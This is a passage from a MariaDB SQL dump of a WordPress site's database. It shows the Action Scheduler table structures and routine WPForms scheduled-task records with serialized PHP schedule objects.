-- MySQL dump 10.19  Distrib 10.2.37-MariaDB, for Linux (x86_64)
--
-- Host: localhost    Database: pickwa5_wp691
-- ------------------------------------------------------
-- Server version	10.2.37-MariaDB-log

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `wpii_actionscheduler_actions`
--

DROP TABLE IF EXISTS `wpii_actionscheduler_actions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_actionscheduler_actions` (
  `action_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `hook` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL,
  `status` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  `scheduled_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `scheduled_date_local` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `args` varchar(191) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `schedule` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `group_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `attempts` int(11) NOT NULL DEFAULT 0,
  `last_attempt_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `last_attempt_local` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `claim_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `extended_args` varchar(8000) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`action_id`),
  KEY `hook` (`hook`),
  KEY `status` (`status`),
  KEY `scheduled_date_gmt` (`scheduled_date_gmt`),
  KEY `args` (`args`),
  KEY `group_id` (`group_id`),
  KEY `last_attempt_gmt` (`last_attempt_gmt`),
  KEY `claim_id` (`claim_id`)
) ENGINE=MyISAM AUTO_INCREMENT=167 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_actionscheduler_actions`
--

LOCK TABLES `wpii_actionscheduler_actions` WRITE;
/*!40000 ALTER TABLE `wpii_actionscheduler_actions` DISABLE KEYS */;
INSERT INTO `wpii_actionscheduler_actions` VALUES (144,'wpforms_process_entry_emails_meta_cleanup','complete','2021-04-02 13:41:11','2021-04-02 13:41:11','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1617370871;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1617370871;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-04-02 14:26:50','2021-04-02 14:26:50',0,NULL),(148,'wpforms_builder_help_cache_update','complete','2021-04-11 19:27:22','2021-04-11 19:27:22','{\"tasks_meta_id\":3}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1618169242;s:18:\"\0*\0first_timestamp\";i:1604535772;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1618169242;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',2,1,'2021-04-11 20:01:28','2021-04-11 20:01:28',0,NULL),(155,'wpforms_process_entry_emails_meta_cleanup','complete','2021-04-11 16:05:31','2021-04-11 16:05:31','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1618157131;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1618157131;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-04-11 16:19:15','2021-04-11 16:19:15',0,NULL),(150,'wpforms_process_entry_emails_meta_cleanup','complete','2021-04-06 14:56:34','2021-04-06 14:56:34','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1617720994;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1617720994;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-04-06 15:04:16','2021-04-06 15:04:16',0,NULL),(149,'wpforms_email_summaries_fetch_info_blocks','complete','2021-04-12 04:44:53','2021-04-12 04:44:53','{\"tasks_meta_id\":null}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1618202693;s:18:\"\0*\0first_timestamp\";i:1611583114;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1618202693;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',2,1,'2021-04-12 04:48:45','2021-04-12 04:48:45',0,NULL),(142,'wpforms_process_entry_emails_meta_cleanup','complete','2021-03-31 13:24:09','2021-03-31 13:24:09','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1617197049;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1617197049;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-03-31 13:36:41','2021-03-31 13:36:41',0,NULL),(156,'wpforms_process_entry_emails_meta_cleanup','complete','2021-04-12 16:19:15','2021-04-12 16:19:15','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1618244355;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1618244355;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-04-12 16:36:05','2021-04-12 16:36:05',0,NULL),(157,'wpforms_builder_help_cache_update','complete','2021-04-18 20:01:28','2021-04-18 20:01:28','{\"tasks_meta_id\":3}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1618776088;s:18:\"\0*\0first_timestamp\";i:1604535772;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1618776088;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',2,1,'2021-04-18 20:27:40','2021-04-18 20:27:40',0,NULL),(140,'wpforms_email_summaries_fetch_info_blocks','complete','2021-04-05 04:37:07','2021-04-05 04:37:07','{\"tasks_meta_id\":null}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1617597427;s:18:\"\0*\0first_timestamp\";i:1611583114;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1617597427;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',2,1,'2021-04-05 04:44:53','2021-04-05 04:44:53',0,NULL),(137,'wpforms_process_entry_emails_meta_cleanup','complete','2021-03-28 11:39:36','2021-03-28 11:39:36','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1616931576;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1616931576;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-03-28 11:47:16','2021-03-28 11:47:16',0,NULL),(132,'wpforms_process_entry_emails_meta_cleanup','complete','2021-03-23 09:53:32','2021-03-23 09:53:32','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1616493212;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1616493212;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-03-23 10:05:17','2021-03-23 10:05:17',0,NULL),(131,'wpforms_email_summaries_fetch_info_blocks','complete','2021-03-29 04:22:50','2021-03-29 04:22:50','{\"tasks_meta_id\":null}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1616991770;s:18:\"\0*\0first_timestamp\";i:1611583114;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1616991770;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',2,1,'2021-03-29 04:37:07','2021-03-29 04:37:07',0,NULL),(133,'wpforms_process_entry_emails_meta_cleanup','complete','2021-03-24 10:05:17','2021-03-24 10:05:17','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1616580317;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1616580317;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-03-24 10:30:19','2021-03-24 10:30:19',0,NULL),(134,'wpforms_process_entry_emails_meta_cleanup','complete','2021-03-25 10:30:19','2021-03-25 10:30:19','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1616668219;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1616668219;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-03-25 10:44:51','2021-03-25 10:44:51',0,NULL),(136,'wpforms_process_entry_emails_meta_cleanup','complete','2021-03-27 10:59:38','2021-03-27 10:59:38','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1616842778;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1616842778;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-03-27 11:39:36','2021-03-27 11:39:36',0,NULL),(138,'wpforms_process_entry_emails_meta_cleanup','complete','2021-03-29 11:47:16','2021-03-29 11:47:16','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1617018436;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1617018436;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-03-29 11:53:10','2021-03-29 11:53:10',0,NULL),(139,'wpforms_builder_help_cache_update','complete','2021-04-04 18:59:03','2021-04-04 18:59:03','{\"tasks_meta_id\":3}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1617562743;s:18:\"\0*\0first_timestamp\";i:1604535772;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1617562743;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',2,1,'2021-04-04 19:27:22','2021-04-04 19:27:22',0,NULL),(129,'wpforms_process_entry_emails_meta_cleanup','complete','2021-03-22 09:43:18','2021-03-22 09:43:18','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1616406198;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1616406198;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-03-22 09:53:32','2021-03-22 09:53:32',0,NULL),(141,'wpforms_process_entry_emails_meta_cleanup','complete','2021-03-30 11:53:10','2021-03-30 11:53:10','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1617105190;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1617105190;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-03-30 13:24:09','2021-03-30 13:24:09',0,NULL),(127,'wpforms_process_entry_emails_meta_cleanup','complete','2021-03-20 08:03:10','2021-03-20 08:03:10','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1616227390;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1616227390;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-03-20 08:42:21','2021-03-20 08:42:21',0,NULL),(130,'wpforms_builder_help_cache_update','complete','2021-03-28 18:46:31','2021-03-28 18:46:31','{\"tasks_meta_id\":3}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1616957191;s:18:\"\0*\0first_timestamp\";i:1604535772;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1616957191;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',2,1,'2021-03-28 18:59:03','2021-03-28 18:59:03',0,NULL),(151,'wpforms_process_entry_emails_meta_cleanup','complete','2021-04-07 15:04:16','2021-04-07 15:04:16','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1617807856;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1617807856;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-04-07 15:04:18','2021-04-07 15:04:18',0,NULL),(163,'wpforms_process_entry_emails_meta_cleanup','complete','2021-04-17 18:02:43','2021-04-17 18:02:43','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1618682563;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1618682563;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-04-17 18:07:10','2021-04-17 18:07:10',0,NULL),(143,'wpforms_process_entry_emails_meta_cleanup','complete','2021-04-01 13:36:41','2021-04-01 13:36:41','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1617284201;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1617284201;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-04-01 13:41:11','2021-04-01 13:41:11',0,NULL),(128,'wpforms_process_entry_emails_meta_cleanup','complete','2021-03-21 08:42:21','2021-03-21 08:42:21','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1616316141;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1616316141;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-03-21 09:43:18','2021-03-21 09:43:18',0,NULL),(135,'wpforms_process_entry_emails_meta_cleanup','complete','2021-03-26 10:44:51','2021-03-26 10:44:51','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1616755491;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1616755491;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-03-26 10:59:38','2021-03-26 10:59:38',0,NULL),(165,'wpforms_process_entry_emails_meta_cleanup','pending','2021-04-19 18:50:59','2021-04-19 18:50:59','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1618858259;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1618858259;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL),(160,'wpforms_process_entry_emails_meta_cleanup','complete','2021-04-14 17:23:14','2021-04-14 17:23:14','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1618420994;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1618420994;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-04-14 17:33:58','2021-04-14 17:33:58',0,NULL),(164,'wpforms_process_entry_emails_meta_cleanup','complete','2021-04-18 18:07:10','2021-04-18 18:07:10','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1618769230;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1618769230;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-04-18 18:50:59','2021-04-18 18:50:59',0,NULL),(122,'wpforms_email_summaries_fetch_info_blocks','complete','2021-03-22 04:21:47','2021-03-22 04:21:47','{\"tasks_meta_id\":null}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1616386907;s:18:\"\0*\0first_timestamp\";i:1611583114;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1616386907;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',2,1,'2021-03-22 04:22:50','2021-03-22 04:22:50',0,NULL),(162,'wpforms_process_entry_emails_meta_cleanup','complete','2021-04-16 17:50:28','2021-04-16 17:50:28','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1618595428;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1618595428;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-04-16 18:02:43','2021-04-16 18:02:43',0,NULL),(121,'wpforms_builder_help_cache_update','complete','2021-03-21 17:43:36','2021-03-21 17:43:36','{\"tasks_meta_id\":3}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1616348616;s:18:\"\0*\0first_timestamp\";i:1604535772;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1616348616;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',2,1,'2021-03-21 18:46:31','2021-03-21 18:46:31',0,NULL),(161,'wpforms_process_entry_emails_meta_cleanup','complete','2021-04-15 17:33:58','2021-04-15 17:33:58','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1618508038;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1618508038;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-04-15 17:50:28','2021-04-15 17:50:28',0,NULL),(126,'wpforms_process_entry_emails_meta_cleanup','complete','2021-03-19 06:29:23','2021-03-19 06:29:23','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1616135363;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1616135363;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-03-19 08:03:10','2021-03-19 08:03:10',0,NULL),(159,'wpforms_process_entry_emails_meta_cleanup','complete','2021-04-13 16:36:05','2021-04-13 16:36:05','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1618331765;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1618331765;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-04-13 17:23:14','2021-04-13 17:23:14',0,NULL),(152,'wpforms_process_entry_emails_meta_cleanup','complete','2021-04-08 15:04:18','2021-04-08 15:04:18','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1617894258;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1617894258;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-04-08 15:42:11','2021-04-08 15:42:11',0,NULL),(154,'wpforms_process_entry_emails_meta_cleanup','complete','2021-04-10 16:03:03','2021-04-10 16:03:03','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1618070583;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1618070583;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-04-10 16:05:31','2021-04-10 16:05:31',0,NULL),(153,'wpforms_process_entry_emails_meta_cleanup','complete','2021-04-09 15:42:11','2021-04-09 15:42:11','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1617982931;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1617982931;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-04-09 16:03:03','2021-04-09 16:03:03',0,NULL),(166,'wpforms_builder_help_cache_update','pending','2021-04-25 20:27:40','2021-04-25 20:27:40','{\"tasks_meta_id\":3}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1619382460;s:18:\"\0*\0first_timestamp\";i:1604535772;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1619382460;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',2,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL),(158,'wpforms_email_summaries_fetch_info_blocks','pending','2021-04-19 04:48:45','2021-04-19 04:48:45','{\"tasks_meta_id\":null}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1618807725;s:18:\"\0*\0first_timestamp\";i:1611583114;s:13:\"\0*\0recurrence\";i:604800;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1618807725;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:604800;}',2,0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,NULL),(147,'wpforms_process_entry_emails_meta_cleanup','complete','2021-04-05 14:39:59','2021-04-05 14:39:59','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1617633599;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1617633599;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-04-05 14:56:34','2021-04-05 14:56:34',0,NULL),(145,'wpforms_process_entry_emails_meta_cleanup','complete','2021-04-03 14:26:50','2021-04-03 14:26:50','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1617460010;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1617460010;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-04-03 14:36:12','2021-04-03 14:36:12',0,NULL),(146,'wpforms_process_entry_emails_meta_cleanup','complete','2021-04-04 14:36:12','2021-04-04 14:36:12','{\"tasks_meta_id\":1}','O:32:\"ActionScheduler_IntervalSchedule\":5:{s:22:\"\0*\0scheduled_timestamp\";i:1617546972;s:18:\"\0*\0first_timestamp\";i:1603929600;s:13:\"\0*\0recurrence\";i:86400;s:49:\"\0ActionScheduler_IntervalSchedule\0start_timestamp\";i:1617546972;s:53:\"\0ActionScheduler_IntervalSchedule\0interval_in_seconds\";i:86400;}',2,1,'2021-04-04 14:39:59','2021-04-04 14:39:59',0,NULL);
/*!40000 ALTER TABLE `wpii_actionscheduler_actions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_actionscheduler_claims`
--

DROP TABLE IF EXISTS `wpii_actionscheduler_claims`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_actionscheduler_claims` (
  `claim_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `date_created_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`claim_id`),
  KEY `date_created_gmt` (`date_created_gmt`)
) ENGINE=MyISAM AUTO_INCREMENT=14130 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_actionscheduler_claims`
--

LOCK TABLES `wpii_actionscheduler_claims` WRITE;
/*!40000 ALTER TABLE `wpii_actionscheduler_claims` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpii_actionscheduler_claims` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_actionscheduler_groups`
--

DROP TABLE IF EXISTS `wpii_actionscheduler_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_actionscheduler_groups` (
  `group_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `slug` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`group_id`),
  KEY `slug` (`slug`(191))
